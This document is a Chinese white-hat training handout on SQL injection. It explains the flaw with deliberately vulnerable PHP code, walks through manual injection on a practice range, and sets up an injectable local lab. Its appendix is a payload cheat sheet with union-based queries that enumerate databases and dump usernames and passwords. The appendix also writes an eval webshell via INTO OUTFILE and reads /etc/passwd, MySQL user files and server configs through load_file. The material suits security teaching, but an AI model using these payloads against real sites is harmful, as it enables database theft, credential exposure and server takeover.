米斯特白帽培訓(xùn)講義 漏洞篇 SQL 注入

講師：gh0stkey

整理：飛龍

協(xié)議：CC BY-NC-SA 4.0

原理與危害

SQL 注入就是指，在輸入的字符串中注入 SQL 語(yǔ)句，如果應(yīng)用相信用戶(hù)的輸入而對(duì)輸入的字符串沒(méi)進(jìn)行任何的過(guò)濾處理，那么這些注入進(jìn)去的 SQL 語(yǔ)句就會(huì)被數(shù)據(jù)庫(kù)誤認(rèn)為是正常的 SQL 語(yǔ)句而被執(zhí)行。

惡意使用 SQL 注入攻擊的人可以通過(guò)構(gòu)建不同的 SQL 語(yǔ)句進(jìn)行脫褲、命令執(zhí)行、寫(xiě) Webshell、讀取度武器敏感系統(tǒng)文件等惡意行為。

以上來(lái)自烏云的案例，都是利用 SQL 注入所造成的一系列危害。

成因

首先來(lái)看這一段代碼（視頻中不是這段代碼，因?yàn)槠涓m合講解，所以用這段代碼）：

$un = @$_POST['un'];
$pw = @$_POST['pw'];

// ...

$sql = "select * from user where un='$un' and pw='$pw'";

可以看到代碼首先從 HTTP 主體取得un和pw兩個(gè)參數(shù)，這兩個(gè)參數(shù)顯然未加過(guò)濾。之后代碼將其拼接到 SQL 語(yǔ)句中。

如果惡意用戶(hù)將un指定為任意正常內(nèi)容，pw為非正常內(nèi)容，那么就有被攻擊的風(fēng)險(xiǎn)。比如我們將un賦為admin，pw賦為' or '1'='1。則整個(gè) SQL 語(yǔ)句會(huì)變?yōu)椋?/p>

select * from user where un='admin' and pw='' or '1'='1'

可以看到where子句對(duì)于任何用戶(hù)都是恒成立的。那么我們就成功繞過(guò)了它的身份驗(yàn)證。

手工注入

自己搭建環(huán)境比較麻煩，大家可以使用http://mst.hi-ourlife.com/hackertest/這個(gè)靶場(chǎng)，秘鑰是ZGhhc2poZGppYXNnaGQ=。

我們進(jìn)入靶場(chǎng)，我們用它來(lái)演示手工注入，當(dāng)然它現(xiàn)在只支持 MySQL 類(lèi)型的手工注入：

首先我們使用單引號(hào)判斷一下，發(fā)現(xiàn)它出錯(cuò)了：

然后是and 1=1：

然后是and 1=2：

下一步就是要看它的字段長(zhǎng)度，使用order by。我們先輸入一個(gè)大一些的數(shù)，比如10：

返回假，然后嘗試5，返回真，說(shuō)明字段數(shù)量為 5：

之后我們需要匹配它的字段，直接用union爆破字段。

查詢(xún)結(jié)果是2，說(shuō)明第二個(gè)字段最終顯示，那么我們可以替換union中的2，比如我們查詢(xún)一下version()。

手工注入（2）

這次是實(shí)戰(zhàn)靶場(chǎng)。首先訪問(wèn)如圖的 URL，猜測(cè)id參數(shù)可能是注入點(diǎn)：

首先按照前面的方式判斷是否存在注入：

可以看到and 1=1返回正常，and 1=2返回異常，表明存在注入。（正常異常的標(biāo)準(zhǔn)是，和不加and一樣就算正常）

之后使用order by探測(cè)字段數(shù)量，嘗試到2時(shí)，發(fā)現(xiàn)返回正常。

聯(lián)合查詢(xún)之后，發(fā)現(xiàn)頁(yè)面中顯示1：

使用version()替換聯(lián)合查詢(xún)中的1，得到版本：

同理我們可以查看database()和user()。

SqlMap 的使用

鍵入如下命令并執(zhí)行：

可以從中看到所有的載荷（payload）。并且我們之前判斷的沒(méi)有錯(cuò)，就是kg。

之后我們?cè)佾@取kg中的表：

結(jié)果是沒(méi)有找到任何表。

環(huán)境搭建

（這節(jié)內(nèi)容課件里面沒(méi)有，是我自己補(bǔ)充的。）

大家可以下載 DVWA 在本地建立實(shí)驗(yàn)環(huán)境，如果覺(jué)得麻煩，可以自己寫(xiě)個(gè)腳本來(lái)建立。這里教給大家如何在本地建立實(shí)驗(yàn)環(huán)境。

首先要在任意數(shù)據(jù)庫(kù)創(chuàng)建一張表，插入一些數(shù)據(jù)：

drop table if exists sqlinj;
create table if not exists sqlinj (
    id int primary key auto_increment,
    info varchar(32)
);
insert into sqlinj values (1, "item: 1");

這里我們創(chuàng)建了sqlinj表，并插入了一條數(shù)據(jù)。其實(shí)插入一條數(shù)據(jù)就夠了，足以查看顯示效果。

之后我們將以下內(nèi)容保存為sql.php：

<form method="POST" target="./sql.php">
    ID：
    <input type="text" name="id" />
    <input type="submit" value="查詢(xún)" />
</form>
<?php
// 改成自己機(jī)子上的配置：
$host = '';
$port = 3306;
$un = '';
$pw = '';
$db = '';

$id = @$_POST['id'];
if($id == '')
    return;
$conn = @mysql_connect($host . ':' . $port, $un, $pw);
if(!$conn)
    die('數(shù)據(jù)庫(kù)連接錯(cuò)誤：' . mysql_error());
mysql_select_db($db, $conn);
$sql = "select id, info from sqlinj where id=$id";
$res = mysql_query($sql, $conn);
if(!$res)
    die('數(shù)據(jù)庫(kù)錯(cuò)誤：'. mysql_error());
$num = mysql_num_rows($res);
if($num == 0)
{ 
    echo "<p>ID：$id</p>";
    echo "<p>無(wú)此記錄</p>";
}
else
{
    $row = mysql_fetch_row($res);
    echo "<p>ID：$id</p>";
    echo "<p>Info：${row[1]}</p>";
}
mysql_close($conn);

在文件目錄下執(zhí)行php -S 0.0.0.0:80，然后訪問(wèn)http://localhost/sql.php，然后就可以進(jìn)行各種操作了：

附錄

判斷是否存在SQL注入

'
and 1=1
and 1=2

暴字段長(zhǎng)度

Order by 數(shù)字

匹配字段

and 1=1 union select 1,2,..,n

暴字段位置

and 1=2 union select 1,2,..,n

利用內(nèi)置函數(shù)暴數(shù)據(jù)庫(kù)信息

version() database() user()

不用猜解可用字段暴數(shù)據(jù)庫(kù)信息(有些網(wǎng)站不適用):

and 1=2 union all select version() 
and 1=2 union all select database() 
and 1=2 union all select user() 

操作系統(tǒng)信息：

and 1=2 union all select @@global.version_compile_os from mysql.user 

數(shù)據(jù)庫(kù)權(quán)限：

and ord(mid(user(),1,1))=114  返回正常說(shuō)明為root

暴庫(kù) (mysql>5.0)

Mysql 5 以上有內(nèi)置庫(kù) information_schema，存儲(chǔ)著mysql的所有數(shù)據(jù)庫(kù)和表結(jié)構(gòu)信息

and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1

猜表

and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=數(shù)據(jù)庫(kù)（十六進(jìn)制） limit 0（開(kāi)始的記錄，0為第一個(gè)開(kāi)始記錄）,1（顯示1條記錄）—

猜字段

and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名（十六進(jìn)制）limit 0,1

暴密碼

and 1=2 Union select 1,2,3,用戶(hù)名段,5,6,7,密碼段,8,9 from 表名 limit 0,1

高級(jí)用法（一個(gè)可用字段顯示兩個(gè)數(shù)據(jù)內(nèi)容）：

Union select 1,2,3,concat(用戶(hù)名段,0x3c,密碼段),5,6,7,8,9 from 表名 limit 0,1

直接寫(xiě)馬(Root權(quán)限)

條件：

1、知道站點(diǎn)物理路徑

2、有足夠大的權(quán)限（可以用select …. from mysql.user測(cè)試）

3、magic_quotes_gpc()=OFF

select ‘<?php eval_r($_POST[cmd])?>' into outfile ‘物理路徑'
and 1=2 union all select 一句話HEX值 into outfile '路徑'

load_file() 常用路徑：

1. replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
2. replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
   上面兩個(gè)是查看一個(gè)PHP文件里完全顯示代碼.有些時(shí)候不替換一些字符,如 < 替換成”空格” 返回的是網(wǎng)頁(yè).而無(wú)法查看到代碼.
3. load_file(char(47)) 可以列出FreeBSD,Sunos系統(tǒng)根目錄
4. /etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虛擬主機(jī)配置文件
5. c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf查看WINDOWS系統(tǒng)apache文件
6. c:/Resin-3.0.14/conf/resin.conf 查看jsp開(kāi)發(fā)的網(wǎng)站 resin文件配置信息.
7. c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系統(tǒng)配置的JSP虛擬主機(jī)
8. d:\APACHE\Apache2\conf\httpd.conf
9. C:\Program Files\mysql\my.ini
10. ../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路徑
11. c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虛擬主機(jī)配置文件
12. /usr/local/resin-3.0.22/conf/resin.conf 針對(duì)3.0.22的RESIN配置文件查看
13. /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
14. /usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虛擬主機(jī)查看
15. /etc/sysconfig/iptables 本機(jī)防火墻策略
16. usr/local/app/php5 b/php.ini PHP 的相當(dāng)設(shè)置
17. /etc/my.cnf MYSQL的配置文件
18. /etc/redhat-release 紅帽子的系統(tǒng)版本
19. C:\mysql\data\mysql\user.MYD 存在MYSQL系統(tǒng)中的用戶(hù)密碼
20. /etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
21. /usr/local/app/php5 b/php.ini //PHP相關(guān)設(shè)置
22. /usr/local/app/apache2/conf/extra tpd-vhosts.conf //虛擬網(wǎng)站設(shè)置
23. C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
24. c:\windows\my.ini
25. c:\boot.ini

網(wǎng)站常用配置文件

config.inc.php、config.php。

load_file()時(shí)要用replace(load_file(HEX)，char(60),char(32))

注：

Char(60)表示 <
Char（32）表示 空格

手工注射時(shí)出現(xiàn)的問(wèn)題：

當(dāng)注射后頁(yè)面顯示：

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

如：

/instrument.php?ID=13 and 1=2 union select 1,load_file(0x433A5C626F6F742E696E69),3,4,user()

這是由于前后編碼不一致造成的，

解決方法：在參數(shù)前加上 unhex(hex(參數(shù)))就可以了。上面的URL就可以改為：

/instrument.php?ID=13 and 1=2 union select 1,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))